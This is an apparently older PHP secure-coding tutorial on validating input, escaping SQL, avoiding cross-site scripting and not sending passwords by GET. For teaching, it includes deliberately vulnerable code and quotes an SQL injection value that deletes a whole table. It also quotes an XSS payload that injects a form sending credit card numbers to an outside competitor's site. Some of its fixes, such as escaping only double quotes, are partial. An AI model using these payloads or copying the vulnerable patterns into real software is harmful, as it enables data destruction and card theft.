Trust is everything in this day and age. You have to trust a lot of people, from the guy who gives you directions to your local plumber. After all, you're not always the authority. However, when developing applications for the web, you must assume the role of authority. Otherwise, the user will assume the role, which is a big gamble: total data integrity, data corruption, or diversion of data -- if the user is the authority, you don't know what the results will be.
We blame a lot of problems on "bad code". However, bad code isn't necessarily written with malicious intent; good code can go bad through simple misunderstandings and misuse of technologies. Three basic steps can be taken to avoid creating bad code. The first step is ensuring that you can trust your input. The next step is manipulating that input data carefully. The final step is providing the appropriate people with secure, reliable access to that data.

Verify That Your Input Is Correct

Never trust the input you receive from someone else. You want your data to have perfect integrity, within the limits that you establish. If you write a routine that saves someone's address to your database, don't trust your routine to magically fix user error. Only you can make that happen.
Let's write some quick code to save those addresses:

<?php

function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
    
    $stmt=OCIPrepare($dbh,"
        Insert into addressBook
            (firstName,lastName,streetAddress,city,zip)
        values
            ('$firstName','$lastName','$streetAddress','$city','$zip')"
    );

    OCIExecute($stmt);
}
    
?>
So what happens if someone leaves the ZIP code out? What if they put "pr0nd00d" as their ZIP code? Do not trust your input. Some might argue that these checks should be done before this function. Well, what if your co-worker, Billy Bob, reuses this function? Now he has to do the checks too. And don't trust he'll do it, either. Billy Bob is a lazy man, and not too smart in the first place.
So let's define a function to make sure the ZIP code is right. After all, my zip code is not "I like cheese."

<?php

function validZipCode($zip) {
    // preg_match() returns 1 on a match and 0 otherwise; ereg() was removed in PHP 7.
    return(preg_match('/^[[:digit:]]{5}(-[[:digit:]]{4})?$/D',$zip));
}
    
?>
The validZipCode() function takes a ZIP code and does a regular expression match against it. If $zip consists of five digits, optionally followed by a dash and a four-digit extension, it returns 1; otherwise it returns 0. Now, let's integrate it with our current function.

<?php

function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
    if(!validZipCode($zip))
        return(0);

    $stmt=OCIPrepare($dbh,"
        Insert into addressBook
            (firstName,lastName,streetAddress,city,zip)
        values
            ('$firstName','$lastName','$streetAddress','$city','$zip')"
    );

    OCIExecute($stmt);
    return(1);
}

?>
Now our current function requires a valid ZIP code. It won't accept a blank one, nor a non-USA one. (Note that our function doesn't simply require a non-blank string -- that would be A Bad Thing(tm).) If a valid ZIP isn't passed, our function returns a 0. But wait...we can rework the logic so that when validZipCode() returns a 0, a more descriptive error is added to an array or returned as a string.

<?php

// Collect one message per failed check.
$errors=array();
if(!validZipCode($zip))
    array_push($errors,"Invalid zip code.");
if(!validStreetAddress($streetAddress))
    array_push($errors,"Invalid address.");

?>
Etc...
Adding the remaining validation functions is an exercise left to the reader. Some checks may not be economically or technologically feasible, as you cannot always afford to verify information beyond a certain point. For example, it would be too slow to confirm every detail of the one hundred addresses per second you receive. However, a simple check like the one outlined above makes it MUCH harder to store data that doesn't make sense. After all, we know that valid U.S. ZIP codes are numeric, and we know how long they can be, so why accept data that's obviously wrong?
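As a minimal sketch of how those descriptive errors might be gathered in one place: the validateAddress() helper and the street-address rule below are assumptions made up for illustration, not part of the original code. validZipCode() is repeated (using preg_match()) so the block runs on its own.

```php
<?php

// Same rule as validZipCode() above: five digits, optional -NNNN extension.
function validZipCode($zip) {
    return preg_match('/^[0-9]{5}(-[0-9]{4})?$/D', $zip) === 1;
}

// Hypothetical rule, for illustration only: non-empty after trimming
// and no longer than 100 characters.
function validStreetAddress($streetAddress) {
    $trimmed = trim($streetAddress);
    return $trimmed !== '' && strlen($trimmed) <= 100;
}

// Hypothetical helper: returns a list of error messages.
// An empty list means every check passed.
function validateAddress($streetAddress, $zip) {
    $errors = array();
    if (!validZipCode($zip)) {
        $errors[] = "Invalid zip code.";
    }
    if (!validStreetAddress($streetAddress)) {
        $errors[] = "Invalid address.";
    }
    return $errors;
}
```

A caller such as saveAddress() could then refuse to touch the database whenever the returned list is non-empty, and hand the messages back to whoever supplied the input.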

Manipulating Your Input

This is a more subtle problem for those who may not fully understand every detail of what they are doing. Good data manipulation is a matter of watching what you do and how you do it, because this is where hackers and crackers can have a field day.
In our original function, there is a statement:

<?php

OCIPrepare($dbh,"
    Insert into addressBook
        (firstName,lastName,streetAddress,city,zip)
    values
        ('$firstName','$lastName','$streetAddress','$city','$zip')"
);

?>
Bob O'Connor is a candidate to have his address saved in our addressBook table. The SQL string that gets parsed now contains "... ('Bob','O'Connor', ...." You may see the error now. That single quote in "O'Connor" needs to be escaped. The Oracle way is to turn "O'Connor" into "O''Connor", by replacing every single apostrophe with two apostrophes.
Bob O'Connor probably doesn't care how you deal with this situation, but let's think about the hacker and/or cracker who will love you for a statement like:
delete from addressBook where lastName=$lastname
What if $lastname="'' or 1"? Now our statement looks like:
delete from addressBook where lastName='' or 1
Everything in your address book has now been successfully deleted. It is now time to break out the 40-gig backup tapes.
Just because one language (like PHP) can take your input without a problem, don't assume that another language (like SQL) will happily accept the same input. This is not a matter of coding for what you want to happen: it is a matter of coding for what you don't want to happen. Escape your characters if you are using more than one language interpreter. If you are using PHP to evaluate dynamic PHP via eval(), don't assume that the variables you use to construct the dynamic PHP will be sane.
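The apostrophe-doubling rule described above can be sketched as a small helper. The name quoteForOracle() is hypothetical, and this is only an illustration of the escaping step, not a complete defence.

```php
<?php

// Hypothetical helper: doubles every single quote so the value can sit inside
// an Oracle string literal, then wraps the result in single quotes.
function quoteForOracle($value) {
    return "'" . str_replace("'", "''", $value) . "'";
}

$lastName = "O'Connor";
$sql = "delete from addressBook where lastName=" . quoteForOracle($lastName);
// $sql is now: delete from addressBook where lastName='O''Connor'

$attack = "'' or 1";
$sql2 = "delete from addressBook where lastName=" . quoteForOracle($attack);
// $sql2 is now: delete from addressBook where lastName=''''' or 1'
// The whole attack string is treated as one (odd-looking) last name.
```

Where the database driver offers bind variables (for example oci_bind_by_name() in PHP's OCI8 extension), passing values that way avoids building the string literal by hand at all.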
One more example. Here's a simple piece of HTML and PHP which does something neat.
<?php

if($CC) {
    save($CC);
    header("Location: https://www.mystore.com/my.php");
    exit();
}
        
?>
<form method="post" action="my.php">
Input your CC number to pay for your purchase.<br>
<input type="text" name="CC" value="<?php echo $CC; ?>"><br>
<input type="submit" value="Show me the money!">
</form>
A piece of code to save your credit card number, but with one faux pas: I didn't check to be sure $CC is valid before trying to save! But save($CC) should check to make sure it's getting valid input, as well. Let's assume the spec for save($CC) is: if the $CC is valid, it is saved; else, an error is returned. So let's change our code to correspond with that spec.

<?php

if(save($CC)) {
    header("Location: ....");
    exit;
}
    
?>
So now if $CC is invalid, our little input tag does something cool. It lets the user see and correct his mistake!
<input type="text" name="CC" value="<?php echo $CC; ?>">
Remember what I said about coding in one language to output to another? This example is vulnerable to cross-site scripting. (This is when you input your own script code as input to another program and the result returned is a page that now does something else -- something the programmer never intended.) A hacker/cracker might input the following for $CC...watch the exact characters used:
"></form><form action=http://www.mycompetitor.com/haha.cgi>
Input your CC again for validation purposes: 
<input name="CC"><input type=submit></form><!--
Don't worry how the person managed to fit all of this into our program. Now our web page will look like this after PHP gets to it:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""></form><form 
action=http://www.mycompetitor.com/haha.cgi>Input your CC again for validation 
purposes: <input name="CC"><input type=submit></form><!--">
<input type="submit" value="Show me the money!">
</form>
This is a very simple hack-and-slash example, but our page will now have two input fields. The first goes nowhere, since its form is closed before any submit button appears. The second sends the credit card number to another site! The rest of the HTML after the second closing form tag is commented out. A quick and nasty hack, eh? We can beautify this further, but the point here is to show that you should never trust your input. Here, HTML is taking its input from PHP.
How to prevent this? A line before or during printing:

<?php

// Replace every double quote with its HTML entity (ereg_replace() was removed in PHP 7).
$CC=str_replace("\"","&quot;",$CC);

?>
Now if some evil person tries the above malicious code, or even a simple:
"><input type="submit" value="DIE!
This will output:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value="&quot;><input 
type=&quot;submit&quot; value=&quot;DIE!">
<input type="submit" value="Show me the money!">
</form>
Annoying to anyone who views it? Yes. Dangerous to your customers? Definitely not. The value in the input field is practically garbage. In fact, you might get a phone call about someone at haha@malicious.com sending you such things. What you do to Mr. "haha" is entirely up to you.
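Replacing only the double quote covers this particular attack. As a broader sketch, PHP's built-in htmlspecialchars() also escapes <, >, & and (with ENT_QUOTES) single quotes. The escapeAttr() wrapper name and the UTF-8 encoding are assumptions chosen for illustration.

```php
<?php

// Hypothetical wrapper: escapes a value for use inside an HTML attribute.
function escapeAttr($value) {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

$CC = '"><input type="submit" value="DIE!';

// The malicious markup ends up as harmless text inside the value attribute.
echo '<input type="text" name="CC" value="' . escapeAttr($CC) . '">';
```

With this in place the browser shows the attacker's text inside the field instead of treating it as new tags.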

How To Access Your Data

Now all your code is proof against cross-site scripting and is saving proper data. Time to make your site public, right? This is another time where you should think twice. For example, your customers are logging into your site to use your two-click purchase (patent pending) fork-in-a-box (patent pending) e-commerce site. You do one of these for a front page:
<form method="get" action="account.php">
ID: <input type="text" name="id">
Password: <input type="password" name="password">
</form>
See the first problem? To submit to your account page, a URL is constructed to pass the variables, like so:
http://www.forkinabox.com/account.php?id=me&password=ilikecheese
In the worst-case scenario, the password is sent in plain text, saved in the browser's history, sent to a proxy and saved in the proxy log, and saved in the webserver's access log. Using the POST method makes things a little (not much) more secure, but someone who is persistent enough can still fake a form submission using the POST method.
Since we are using the GET method to get the variables into PHP in the prior example, anyone can try an unlimited number of IDs and passwords just by editing the URL. (Microsoft suffered this one with their Passport system a while back.) Instead of GET, use $_POST[] (called $HTTP_POST_VARS[] in older versions of PHP) for information that is vital for access or needs to be secure for other reasons. The rest of the time you can use the GET method -- most of the time a search term doesn't have to be kept secret.
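A minimal sketch of reading the login fields from POST data only, assuming the form's method is changed to "post". The credentialsFromPost() helper is hypothetical; the field names id and password come from the form above.

```php
<?php

// Hypothetical helper: pulls the login fields out of POST data only.
// Returns array('id' => ..., 'password' => ...), or null if either
// field is missing, empty, or not a plain string.
function credentialsFromPost($post) {
    if (!isset($post['id'], $post['password'])) {
        return null;
    }
    if (!is_string($post['id']) || !is_string($post['password'])) {
        return null;
    }
    if ($post['id'] === '' || $post['password'] === '') {
        return null;
    }
    return array('id' => $post['id'], 'password' => $post['password']);
}

// In account.php this would be called as credentialsFromPost($_POST),
// so values arriving in the query string ($_GET) are never consulted.
```

This keeps the password out of the URL, though it does nothing by itself to stop repeated guessing; that still has to be handled on the server.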
Since it is possible for someone in the network to be sniffing for clear-text (non-encrypted) data, using https (SSL) will encrypt the remaining data to make it more secure. It is possible to break this kind of encryption, but at present it takes someone with a lot of computing power to decrypt your data and fake input to your forms. [Insert your favorite conspiracy theory here.]
But let's say that we want to be slick and bypass PHP. (That's the reason why we're writing bad code, no?) Checking with JavaScript for valid input or even a valid user and password has been done. But then what happens when I turn off JavaScript?
Don't depend on JavaScript for anything more important than user convenience. You can cache data with it, make pretty things with it, and use it to do fast checks for invalid data, but don't depend on JavaScript to get proper input to your server. As soon as the user turns it off, your authentication and data checking are out the door. You can speed up the data checking and shave some processing time off the server, but users can turn it off. I know I do!
This article may be in three parts, but it has one point in mind: Never trust anything that you don't have control over. Don't trust the input to your functions, the data used to generate pages, nor the network. This means check your input when it comes in, clean the input for further use, and access it in a sane (and maybe even secure) fashion. The more authority you take, the less chance the user can be malicious.
-- Spencer